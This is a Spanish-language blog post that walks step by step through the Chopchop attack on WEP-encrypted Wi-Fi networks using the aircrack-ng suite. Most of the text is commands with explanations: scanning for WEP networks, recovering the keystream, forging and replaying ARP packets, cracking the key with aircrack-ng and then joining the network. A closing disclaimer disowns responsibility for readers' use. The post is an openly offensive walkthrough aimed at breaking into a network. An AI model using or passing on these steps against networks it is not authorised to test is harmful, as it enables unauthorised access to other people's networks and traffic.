Introducción
Saltando un poco la teoría del algoritmo WEP, trataré de explicar brevemente este ataque y los usos que podemos darles. Chopchop se basa en la adivinación del Integrity Check Value (ICV) utilizando una relación matemática exitente entre los paquetes cifrado y el código con el que verificar su integridad.
Esto se consigue truncando la información de un paquete cifrado con la clave compartida WEP y eliminándo el último byte. Este último, se sustituye por un valor conocido (00, 01... 255, 256) y se envia al Access Point para que compruebe su integridad. Debido a los pocos valores a probar, en pocos minutos encontramos un paquete que es tomado como válido y lo utilizamos para obtener el keystream de la conexión.
Ataque Chopchop
Como siempre, lo primero que debemos hacer es poner en modo monitor la tarjeta wireless que vamos a utilizar.
Arrancamos Airodump para ver las redes que tenemos disponibles con el comando:
airodump-ng --encrypt WEP -a mon0
Explicación:
--encrypt WEP. Filtramos las redes WEP
-a. Filtramos los clientes no conectados
mon0. Interfaz wireless
Una vez seleccionamos la red objetivo, volvemos a lanzar el comando anterior para filtrar el tráfico que nos interesa
airodump-ng -w out --bssid E0:91:53:... -c 6 mon0
Explicación:
-w out. Archivo de captura
--bssid E0:91:53:.... BSSID del AP
-c 6. Canal que utiliza la red
mon0. Interfaz
Ahora lanzamos el ataque Chochop con el comando:
aireplay-ng --chopchop -b E0:91:53:... -h 00:26:82:... mon0
Explicación:
--chopchop. Ataque Chopchop
-b E0:91:53:.... Dirección física del AP
-h 00:26:82:.... Dirección MAC del clietne
mon0. Interfaz utilizada
Una vez encontramos un paquete que el AP toma como válido, éste es utilizado para obtener el PRGA de la conexión
Ahora forjamos una petición ARP Request con packetforje-ng que utilizaremos para injectarlo en un ataque ARP replay. Aunque en la documentación sobre Chopchop utilizan tcpdump para obtener la dirección IP destino, yo utilizo una dirección de broadcast genérica que será aceptada por todos los routers.
packetforje-ng --arp \
-a E0:91:53:... \
-h 00:26:82:... \
-k 255.255.255.255 \
-l 255.255.255.255 \
-y replay_dec-1107-231548.xor \
-w salida
Explicación:
--arp. Tipo de paquete a forjar
-a E0:91:53:.... Dirección MAC del AP
-h 00:26:82:.... Dirección física del cliente
-k 255.255.255.255. Dirección IP origen
-l 255.255.255.255. Dirección IP destino
-y replay_dec-1107-231548.xor. Paquete con el PRGA
-w salida. Paquete de salida
Ahora solamente reinjectamos el paquete que acabamos de crear con el comando
aireplay-ng --arpreplay -r salida -x 600 -b E0:91:53:... -h 00:26:82:... mon0
Explicación:
--arpreplay. Ataque ARP replay
-r salida. Nombre del archivo de origen
-x 600. Número de paquetes a enviar
-b E0:91:53:.... BSSID del AP
-h 00:26:82:.... Dirección MAC del cliente
mon0. Interfaz
Nuevamente, a los pocos minutos obtenemos la cantidad de paquetes necesarios para descifrar la clave WEP
Pasamos el craqueador con el comando
aircrack-ng out-01.cap
Ahora como siempre, pasamos a comprobar que la clave es correcta y que tenemos conexión con Internet. Lo primero, desactivar el modo monitor
Configuramos nuestra tarjeta con los datos de la red
Y lanzamos la petición DHCP para obtener una dirección IP válida para la red
Por último, actualizo la lista de paquetes para comprobar que tengo conexión al exterior
Importante
Esta documentación se expone a título informativo, en ningún caso el autor se hace responsable de los usos que los lectores hagan de ella o de las consecuencias a terceros que estos provequen.
Enlaces de referencia
http://www.aircrack-ng.org/doku.php?id=es:korek_chopchop
http://www.aircrack-ng.org/doku.php?id=chopchoptheory
http://www.netstumbler.org/f50/chopchop-experimental-wep-attacks-12489/
http://www.wve.org/entries/show/213
Byte-Sized Decryption of WEP with Chopchop (I y II)
Un saludo, Brixton Cat.
No hay comentarios:
Publicar un comentario
Bienvenid= si quieres dejar un comentario